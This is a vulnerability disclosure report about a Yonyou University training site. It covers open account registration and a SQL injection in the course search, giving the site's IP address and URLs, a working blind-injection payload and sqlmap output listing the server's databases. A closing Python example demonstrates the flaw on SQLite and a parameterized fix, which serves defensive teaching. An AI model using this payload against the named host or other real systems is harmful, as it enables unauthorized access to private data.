### Brief description:

Yonyou University: arbitrary user registration + SQL injection

### Details:

Yonyou University: arbitrary user registration + SQL injection. Register any account and log in, then perform a truncation injection in the course search field.

Login: http://123.103.9.77/WebLogin.aspx

Registration: http://123.103.9.77/User_Regist.aspx

### Proof of vulnerability:

[![1.png](https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png)](https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png)

Injection parameter:

```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: order=z_products&isget=all&name=NC%E4%BE%9B%E5%BA%94%E9%93%BE%E9%AB%98%E7%BA%A7%E8%AE%A4%E8%AF%81%' AND 5431=5431 AND '%'='
[14:55:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[14:55:39] [INFO] fetching database names
[14:55:39] [INFO] the SQL query used returns 9 entries
[14:55:39] [INFO] resumed: 155_PX_New_yy
[14:55:39] [INFO] resumed: master
[14:55:39] [INFO] resumed: model
[14:55:39] [INFO] resumed: msdb
[14:55:39] [INFO] resumed: ReportServer
[14:55:39] [INFO] resumed: ReportServerTempDB
[14:55:39] [INFO] resumed: tempdb
[14:55:39] [INFO] resumed: Timber_PX_New_test
[14:55:39] [INFO] resumed: Timber_PX_New_yy
available databases [9]:
[*] 155_PX_New_yy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Timber_PX_New_test
[*] Timber_PX_New_yy
```
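
The flaw and its fix, as an added example that is not part of the original report or the vendor's code. The query shape (search input concatenated into a `LIKE '%…%'` clause) is an assumption inferred from the payload above; the `courses` table, its rows and every function name are constructed, and SQLite stands in for SQL Server so the block runs offline.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE courses (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO courses (name) VALUES (?)",
                   [("NC Supply Chain Advanced Certification",),
                    ("U8 Finance Basics",),
                    ("100% Online Onboarding",)])
    return db

def search_vulnerable(db, name):
    # Assumed shape of the flawed search: input concatenated into the statement,
    # so a quote in `name` ends the string literal and the rest is parsed as SQL.
    sql = "SELECT name FROM courses WHERE name LIKE '%" + name + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(term, esc="\\"):
    # Neutralise LIKE wildcards so the input only matches literally.
    # (SQL Server's LIKE also treats '[' as special and would need escaping.)
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term

def search_safe(db, name):
    # The input is bound as a parameter, so it stays data and never becomes SQL.
    sql = "SELECT name FROM courses WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(name) + "%",))]

def is_injectable(search, db, prefix):
    # Regression check built on the condition pair the sqlmap output reports:
    # if an always-true and an always-false suffix change the result set,
    # the input is being interpreted as SQL.
    true_rows = search(db, prefix + "%' AND 5431=5431 AND '%'='")
    false_rows = search(db, prefix + "%' AND 5431=5432 AND '%'='")
    return true_rows != false_rows

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", is_injectable(search_vulnerable, db, "NC Supply"))
    print("parameterized query injectable:", is_injectable(search_safe, db, "NC Supply"))
    print("literal '%' search:", search_safe(db, "%"))
```

On the stack named in the report, the equivalent fix is a `SqlCommand` with a `SqlParameter` for the `name` value instead of string concatenation.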